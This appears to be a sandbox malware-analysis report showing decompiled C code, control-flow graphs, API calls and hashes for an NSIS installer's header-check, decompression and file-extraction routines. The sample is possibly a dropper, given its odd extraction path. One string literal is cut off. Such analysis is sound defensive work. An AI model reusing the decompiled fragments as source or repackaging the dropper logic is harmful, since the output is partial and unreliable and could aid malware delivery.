                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                            • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                            • API String ID: 717251189-320443853
                                                            • Opcode ID: 838a228d43f25cac2ee0c0fa74933bf62ea0f71a5a7e27bbbeaab37106ce29fc
                                                            • Instruction ID: ebe98ae1178673def3e02426a949122db7229e586474bd24546af65fb667a20e
                                                            • Opcode Fuzzy Hash: 838a228d43f25cac2ee0c0fa74933bf62ea0f71a5a7e27bbbeaab37106ce29fc
                                                            • Instruction Fuzzy Hash: D5611571900204AFEF219F24DD94B7E3BA4AB06714F12403FE943BA2D2D67C89A1DB5D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00402F0C Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 181memoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 660 402f0c-402f5a GetTickCount GetModuleFileNameA call 405dea 663 402f66-402f94 call 406257 call 405c30 call 406257 GetFileSize 660->663 664 402f5c-402f61 660->664 672 402f9a 663->672 673 40307f-40308d call 402ea8 663->673 665 40313c-403140 664->665 675 402f9f-402fb6 672->675 680 4030e2-4030e7 673->680 681 40308f-403092 673->681 676 402fb8 675->676 677 402fba-402fc3 call 403355 675->677 676->677 686 4030e9-4030f1 call 402ea8 677->686 687 402fc9-402fd0 677->687 680->665 683 403094-4030ac call 40336b call 403355 681->683 684 4030b6-4030e0 GlobalAlloc call 40336b call 403143 681->684 683->680 706 4030ae-4030b4 683->706 684->680 711 4030f3-403104 684->711 686->680 690 402fd2-402fe6 call 405da5 687->690 691 40304c-403050 687->691 696 40305a-403060 690->696 709 402fe8-402fef 690->709 695 403052-403059 call 402ea8 691->695 691->696 695->696 702 403062-40306c call 40671a 696->702 703 40306f-403077 696->703 702->703 703->675 710 40307d 703->710 706->680 706->684 709->696 713 402ff1-402ff8 709->713 710->673 714 403106 711->714 715 40310c-403111 711->715 713->696 717 402ffa-403001 713->717 714->715 716 403112-403118 715->716 716->716 718 40311a-403135 SetFilePointer call 405da5 716->718 717->696 719 403003-40300a 717->719 722 40313a 718->722 719->696 721 40300c-40302c 719->721 721->680 723 403032-403036 721->723 722->665 724 403038-40303c 723->724 725 40303e-403046 723->725 724->710 724->725 725->696 726 403048-40304a 725->726 726->696
                                                            C-Code - Quality: 78%
                                                            			E00402F0C(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t50;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				long _t70;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				void* _t85;
				signed int _t87;
				void* _t89;
				long _t90;
				long _t93;
				intOrPtr* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				 *0x45242c = GetTickCount() + 0x3e8;
				GetModuleFileNameA(0, 0x489000, 0x2000);
				_t89 = E00405DEA(0x489000, 0x80000000, 3);
				_v16 = _t89;
				 *0x40a018 = _t89;
				if(_t89 == 0xffffffff) {
					return "Error launching installer";
				}
				E00406257(0x481000, 0x489000);
				E00406257(0x48b000, E00405C30(0x481000));
				_t50 = GetFileSize(_t89, 0);
				 *0x43204c = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402EA8(1);
					if( *0x452434 == _t82) {
						goto L29;
					}
					if(_v8 == _t82) {
						L28:
						_t94 = GlobalAlloc(0x40, _v24);
						E0040336B( *0x452434 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E00403143(); // executed
						if(_t57 == _v24) {
							 *0x452430 = _t94;
							 *0x452438 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x45243c =  *0x45243c + 1;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405DA5(0x452440, _t94 + 4, 0x40);
							return 0;
						}
						goto L29;
					}
					E0040336B( *0x426040);
					if(E00403355( &_a4, 4) == 0 || _v12 != _a4) {
						goto L29;
					} else {
						goto L28;
					}
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x452434) & 0x00007e00) + 0x200;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						if(E00403355(0x41e040, _t90) == 0) {
							E00402EA8(1);
							L29:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x452434 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E00402EA8(0);
							}
							goto L20;
						}
						E00405DA5( &_v44, 0x41e040, 0x1c);
						_t77 = _v44;
						if((_t77 & 0xfffffff0) == 0 && _v40 == 0xdeadbeef && _v28 == 0x74736e49 && _v32 == 0x74666f73 && _v36 == 0x6c6c754e) {
							_a4 = _a4 | _t77;
							_t87 =  *0x426040; // 0xa399b
							 *0x4524c0 =  *0x4524c0 | _a4 & 0x00000002;
							_t80 = _v20;
							 *0x452434 = _t87;
							if(_t80 > _t93) {
								goto L29;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v8 = _v8 + 1;
								_t24 = _t80 - 4; // 0x5
								_t93 = _t24;
								if(_t90 > _t93) {
									_t90 = _t93;
								}
								goto L20;
							} else {
								break;
							}
						}
						L20:
						if(_t93 <  *0x43204c) {
							_v12 = E0040671A(_v12, 0x41e040, _t90);
						}
						 *0x426040 =  *0x426040 + _t90;
						_t93 = _t93 - _t90;
					} while (_t93 != 0);
					_t82 = 0;
					goto L24;
				}
			}



























                                                            0x00402f14
                                                            0x00402f17
                                                            0x00402f1a
                                                            0x00402f34
                                                            0x00402f39
                                                            0x00402f4c
                                                            0x00402f51
                                                            0x00402f54
                                                            0x00402f5a
                                                            0x00000000
                                                            0x00402f5c
                                                            0x00402f6d
                                                            0x00402f7e
                                                            0x00402f85
                                                            0x00402f8d
                                                            0x00402f92
                                                            0x00402f94
                                                            0x0040307f
                                                            0x00403081
                                                            0x0040308d
                                                            0x00000000
                                                            0x00000000
                                                            0x00403092
                                                            0x004030b6
                                                            0x004030c1
                                                            0x004030cc
                                                            0x004030d1
                                                            0x004030d4
                                                            0x004030d5
                                                            0x004030d6
                                                            0x004030d8
                                                            0x004030e0
                                                            0x004030f7
                                                            0x004030ff
                                                            0x00403104
                                                            0x00403106
                                                            0x00403106
                                                            0x0040310e
                                                            0x0040310e
                                                            0x00403111
                                                            0x00403112
                                                            0x00403112
                                                            0x00403115
                                                            0x00403117
                                                            0x00403117
                                                            0x00403121
                                                            0x00403127
                                                            0x00403135
                                                            0x00000000
                                                            0x0040313a
                                                            0x00000000
                                                            0x004030e0
                                                            0x0040309a
                                                            0x004030ac
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00402f9a
                                                            0x00402f9f
                                                            0x00402fa4
                                                            0x00402fa8
                                                            0x00402faf
                                                            0x00402fb6
                                                            0x00402fb8
                                                            0x00402fb8
                                                            0x00402fc3
                                                            0x004030eb
                                                            0x004030e2
                                                            0x00000000
                                                            0x004030e2
                                                            0x00402fd0
                                                            0x00403050
                                                            0x00403054
                                                            0x00403059
                                                            0x00000000
                                                            0x00403050
                                                            0x00402fd9
                                                            0x00402fde
                                                            0x00402fe6
                                                            0x0040300c
                                                            0x00403012
                                                            0x0040301b
                                                            0x00403021
                                                            0x00403026
                                                            0x0040302c
                                                            0x00000000
                                                            0x00000000
                                                            0x00403036
                                                            0x0040303e
                                                            0x00403041
                                                            0x00403041
                                                            0x00403046
                                                            0x00403048
                                                            0x00403048
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00403036
                                                            0x0040305a
                                                            0x00403060
                                                            0x0040306c
                                                            0x0040306c
                                                            0x0040306f
                                                            0x00403075
                                                            0x00403075
                                                            0x0040307d
                                                            0x00000000
                                                            0x0040307d

                                                            APIs
                                                            • GetTickCount.KERNEL32(75572754,00485000,0047B000,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00402F1D
                                                            • GetModuleFileNameA.KERNEL32(00000000,00489000,00002000,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00402F39
                                                              • Part of subcall function 00405DEA: GetFileAttributesA.KERNELBASE(00000003,00402F4C,00489000,80000000,00000003,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00405DEE
                                                              • Part of subcall function 00405DEA: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E10
                                                            • GetFileSize.KERNEL32(00000000,00000000,0048B000,00000000,00481000,00481000,00489000,00489000,80000000,00000003,?,?,004036FD,?,?,00000007), ref: 00402F85
                                                            • GlobalAlloc.KERNEL32(00000040,00000007,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 004030BB
                                                            Strings
                                                            • Null, xrefs: 00403003
                                                            • @A, xrefs: 00402F9A
                                                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 004030E2
                                                            • Error launching installer, xrefs: 00402F5C
                                                            • soft, xrefs: 00402FFA
                                                            • Inst, xrefs: 00402FF1
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                            • String ID: @A$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                            • API String ID: 2803837635-2937945327
                                                            • Opcode ID: ef4c9a5dc92e0d7598bd923cfc77fc61e239af6537ea3ff3a5b4cfa1ca02d18f
                                                            • Instruction ID: 4581bf354a42e99e0fb2dd836479f673db23d0c593d329681b7c8fb4cfaa4e30
                                                            • Opcode Fuzzy Hash: ef4c9a5dc92e0d7598bd923cfc77fc61e239af6537ea3ff3a5b4cfa1ca02d18f
                                                            • Instruction Fuzzy Hash: E751B431901204ABDB20AF65DD85B9F7EACEB15356F20813BF501B62D2C7BC8E418B5D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00403143 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 166COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 727 403143-403157 728 403160-403169 727->728 729 403159 727->729 730 403172-403177 728->730 731 40316b 728->731 729->728 732 403187-403194 call 403355 730->732 733 403179-403182 call 40336b 730->733 731->730 737 403343 732->737 738 40319a-40319e 732->738 733->732 739 403345-403346 737->739 740 4031a4-4031ed GetTickCount 738->740 741 4032ee-4032f0 738->741 744 40334e-403352 739->744 745 4031f3-4031fb 740->745 746 40334b 740->746 742 403330-403333 741->742 743 4032f2-4032f5 741->743 747 403335 742->747 748 403338-403341 call 403355 742->748 743->746 749 4032f7 743->749 750 403200-40320e call 403355 745->750 751 4031fd 745->751 746->744 747->748 748->737 759 403348 748->759 753 4032fa-403300 749->753 750->737 761 403214-40321d 750->761 751->750 756 403302 753->756 757 403304-403312 call 403355 753->757 756->757 757->737 764 403314-403320 call 405e91 757->764 759->746 763 403223-403243 call 406788 761->763 769 4032e6-4032e8 763->769 770 403249-40325c GetTickCount 763->770 773 403322-40332c 764->773 774 4032ea-4032ec 764->774 769->739 771 4032a1-4032a3 770->771 772 40325e-403266 770->772 777 4032a5-4032a9 771->777 778 4032da-4032de 771->778 775 403268-40326c 772->775 776 40326e-403299 MulDiv wsprintfA call 405378 772->776 773->753 779 40332e 773->779 774->739 775->771 775->776 784 40329e 776->784 781 4032c0-4032cb 777->781 782 4032ab-4032b2 call 405e91 777->782 778->745 783 4032e4 778->783 779->746 786 4032ce-4032d2 781->786 787 4032b7-4032b9 782->787 783->746 784->771 786->763 788 4032d8 786->788 787->774 789 4032bb-4032be 787->789 788->746 789->786
                                                            C-Code - Quality: 95%
                                                            			E00403143(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
				signed int _v8;
				int _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				char _v88;
				void* _t65;
				long _t70;
				intOrPtr _t75;
				long _t76;
				intOrPtr _t77;
				void* _t78;
				int _t88;
				intOrPtr _t92;
				intOrPtr _t95;
				long _t96;
				signed int _t97;
				int _t98;
				int _t99;
				intOrPtr _t100;
				void* _t101;
				void* _t102;

				_t97 = _a16;
				_t92 = _a12;
				_v12 = _t97;
				if(_t92 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t92;
				if(_t92 == 0) {
					_v16 = 0x42a048;
				}
				_t62 = _a4;
				if(_a4 >= 0) {
					E0040336B( *0x452478 + _t62);
				}
				if(E00403355( &_a16, 4) == 0) {
					L41:
					_push(0xfffffffd);
					goto L42;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t92 != 0) {
							if(_a16 < _t97) {
								_t97 = _a16;
							}
							if(E00403355(_t92, _t97) != 0) {
								_v8 = _t97;
								L44:
								return _v8;
							} else {
								goto L41;
							}
						}
						if(_a16 <= _t92) {
							goto L44;
						}
						_t88 = _v12;
						while(1) {
							_t98 = _a16;
							if(_a16 >= _t88) {
								_t98 = _t88;
							}
							if(E00403355(0x426048, _t98) == 0) {
								goto L41;
							}
							if(E00405E91(_a8, 0x426048, _t98) == 0) {
								L28:
								_push(0xfffffffe);
								L42:
								_pop(_t65);
								return _t65;
							}
							_v8 = _v8 + _t98;
							_a16 = _a16 - _t98;
							if(_a16 > 0) {
								continue;
							}
							goto L44;
						}
						goto L41;
					}
					_t70 = GetTickCount();
					 *0x4149ac =  *0x4149ac & 0x00000000;
					 *0x4149a8 =  *0x4149a8 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t70;
					 *0x414490 = 8;
					 *0x41e038 = 0x416030;
					 *0x41e034 = 0x416030;
					 *0x41e030 = 0x41e030;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L44;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t99 = 0x4000;
						if(_a16 < 0x4000) {
							_t99 = _a16;
						}
						if(E00403355(0x426048, _t99) == 0) {
							goto L41;
						}
						_a16 = _a16 - _t99;
						 *0x414480 = 0x426048;
						 *0x414484 = _t99;
						while(1) {
							_t95 = _v16;
							 *0x414488 = _t95;
							 *0x41448c = _v12;
							_t75 = E00406788("\xef\xbf\							_v24 = _t75;
							if(_t75 < 0) {
								break;
							}
							_t100 =  *0x414488; // 0x42ce48
							_t101 = _t100 - _t95;
							_t76 = GetTickCount();
							_t96 = _t76;
							if(( *0x4524d4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v88, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t102 = _t102 + 0xc;
								E00405378(0,  &_v88); // executed
								_v20 = _t96;
							}
							if(_t101 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L44;
							} else {
								if(_a12 != 0) {
									_t77 =  *0x414488; // 0x42ce48
									_v8 = _v8 + _t101;
									_v12 = _v12 - _t101;
									_v16 = _t77;
									L23:
									if(_v24 != 1) {
										continue;
									}
									goto L44;
								}
								_t78 = E00405E91(_a8, _v16, _t101); // executed
								if(_t78 == 0) {
									goto L28;
								}
								_v8 = _v8 + _t101;
								goto L23;
							}
						}
						_push(0xfffffffc);
						goto L42;
					}
					goto L41;
				}
			}

























                                                            0x0040314b
                                                            0x0040314f
                                                            0x00403152
                                                            0x00403157
                                                            0x00403159
                                                            0x00403159
                                                            0x00403160
                                                            0x00403164
                                                            0x00403169
                                                            0x0040316b
                                                            0x0040316b
                                                            0x00403172
                                                            0x00403177
                                                            0x00403182
                                                            0x00403182
                                                            0x00403194
                                                            0x00403343
                                                            0x00403343
                                                            0x00000000
                                                            0x0040319a
                                                            0x0040319e
                                                            0x004032f0
                                                            0x00403333
                                                            0x00403335
                                                            0x00403335
                                                            0x00403341
                                                            0x00403348
                                                            0x0040334b
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00403341
                                                            0x004032f5
                                                            0x00000000
                                                            0x00000000
                                                            0x004032f7
                                                            0x004032fa
                                                            0x004032fd
                                                            0x00403300
                                                            0x00403302
                                                            0x00403302
                                                            0x00403312
                                                            0x00000000
                                                            0x00000000
                                                            0x00403320
                                                            0x004032ea
                                                            0x004032ea
                                                            0x00403345
                                                            0x00403345
                                                            0x00000000
                                                            0x00403345
                                                            0x00403322
                                                            0x00403325
                                                            0x0040332c
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0040332e
                                                            0x00000000
                                                            0x004032fa
                                                            0x004031aa
                                                            0x004031ac
                                                            0x004031b3
                                                            0x004031ba
                                                            0x004031ba
                                                            0x004031c1
                                                            0x004031c9
                                                            0x004031d3
                                                            0x004031d8
                                                            0x004031e0
                                                            0x004031ea
                                                            0x004031ed
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004031f3
                                                            0x004031f3
                                                            0x004031f3
                                                            0x004031fb
                                                            0x004031fd
                                                            0x004031fd
                                                            0x0040320e
                                                            0x00000000
                                                            0x00000000
                                                            0x00403214
                                                            0x00403217
                                                            0x0040321d
                                                            0x00403223
                                                            0x00403223
                                                            0x0040322e
                                                            0x00403234
                                                            0x00403239
                                                            0x00403240
                                                            0x00403243
                                                            0x00000000
                                                            0x00000000
                                                            0x00403249
                                                            0x0040324f
                                                            0x00403251
                                                            0x0040325a
                                                            0x0040325c
                                                            0x0040328a
                                                            0x00403290
                                                            0x00403299
                                                            0x0040329e
                                                            0x0040329e
                                                            0x004032a3
                                                            0x004032de
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004032a5
                                                            0x004032a9
                                                            0x004032c0
                                                            0x004032c5
                                                            0x004032c8
                                                            0x004032cb
                                                            0x004032ce
                                                            0x004032d2
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004032d8
                                                            0x004032b2
                                                            0x004032b9
                                                            0x00000000
                                                            0x00000000
                                                            0x004032bb
                                                            0x00000000
                                                            0x004032bb
                                                            0x004032a3
                                                            0x004032e6
                                                            0x00000000
                                                            0x004032e6
                                                            0x00000000
                                                            0x004031f3

                                                            APIs
                                                            • GetTickCount.KERNEL32(000000FF,00000004,00000000,00000000,00000000), ref: 004031AA
                                                            • GetTickCount.KERNEL32({B,00426048,00004000), ref: 00403251
                                                            • MulDiv.KERNEL32 ref: 0040327A
                                                            • wsprintfA.USER32 ref: 0040328A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: CountTick$wsprintf
                                                            • String ID: ... %d%%$0`A$H`B$H`B${B
                                                            • API String ID: 551687249-3260306330
                                                            • Opcode ID: 0c9fc1d85663aad53be424f08f543157a3ad91164e87d18aa7b079f2db5192f9
                                                            • Instruction ID: 5e435b9e5989c49516ab484f42c851a836a172a2bf0c70b81729303e7d6c5b04
                                                            • Opcode Fuzzy Hash: 0c9fc1d85663aad53be424f08f543157a3ad91164e87d18aa7b079f2db5192f9
                                                            • Instruction Fuzzy Hash: 59516A71801219AFDB10CFA5DA8479F7BA8AB45766F14817BEC01B72C0C7789A50CBA9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00401759 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 790 401759-40177c call 402c39 call 405c56 795 401786-401798 call 406257 call 405be9 lstrcatA 790->795 796 40177e-401784 call 406257 790->796 801 40179d-4017a3 call 406535 795->801 796->801 806 4017a8-4017ac 801->806 807 4017ae-4017b8 call 4065ce 806->807 808 4017df-4017e2 806->808 815 4017ca-4017dc 807->815 816 4017ba-4017c8 CompareFileTime 807->816 810 4017e4-4017e5 call 405dc5 808->810 811 4017ea-401806 call 405dea 808->811 810->811 818 401808-40180b 811->818 819 40187e-4018a7 call 405378 call 403143 811->819 815->808 816->815 820 401860-40186a call 405378 818->820 821 40180d-40184f call 406257 * 2 call 4062ea call 406257 call 40596d 818->821 833 4018a9-4018ad 819->833 834 4018af-4018bb SetFileTime 819->834 831 401873-401879 820->831 821->806 855 401855-401856 821->855 835 402ace 831->835 833->834 837 4018c1-4018cc CloseHandle 833->837 834->837 839 402ad0-402ad4 835->839 840 4018d2-4018d5 837->840 841 402ac5-402ac8 837->841 843 4018d7-4018e8 call 4062ea lstrcatA 840->843 844 4018ea-4018ed call 4062ea 840->844 841->835 848 4018f2-40238a 843->848 844->848 853 40238f-402394 848->853 854 40238a call 40596d 848->854 853->839 854->853 855->831 856 401858-401859 855->856 856->820
                                                            C-Code - Quality: 73%
                                                            			E00401759(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402C39(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E00405C56(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E00405BE9(E00406257(0x40a438, "C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Drukneddens\\Bruckled\\Kededes")), ??);
				} else {
					_push(0x40a438);
					E00406257();
				}
				E00406535(0x40a438);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E004065CE(0x40a438);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E00405DC5(0x40a438);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E00405DEA(0x40a438, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0xc) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00405378(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x4524a8 =  *0x4524a8 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x4524a8;
						goto L32;
					} else {
						E00406257(0x40e438, 0x453000);
						E00406257(0x453000, 0x40a438);
						E004062EA(_t75, 0x40e438, 0x40a438, "C:\Users\Albus\AppData\Local\Temp\nsx1ED8.tmp\System.dll",  *((intOrPtr*)(_t85 - 0x14)));
						E00406257(0x453000, 0x40e438);
						_t62 = E0040596D("C:\Users\Albus\AppData\Local\Temp\nsx1ED8.tmp\System.dll",  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x4524a8 =  &( *0x4524a8->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x40a438);
								_push(0xfffffffa);
								E00405378();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00405378(0xffffffea,  *(_t85 - 8)); // executed
				 *0x4524d4 =  *0x4524d4 + 1;
				_t43 = E00403143( *((intOrPtr*)(_t85 - 0x20)),  *(_t85 - 0xc), _t75, _t75); // executed
				 *0x4524d4 =  *0x4524d4 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0xc), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				CloseHandle( *(_t85 - 0xc)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E004062EA(_t75, _t80, 0x40a438, 0x40a438, 0xffffffee);
					} else {
						E004062EA(_t75, _t80, 0x40a438, 0x40a438, 0xffffffe9);
						lstrcatA(0x40a438,  *(_t85 - 8));
					}
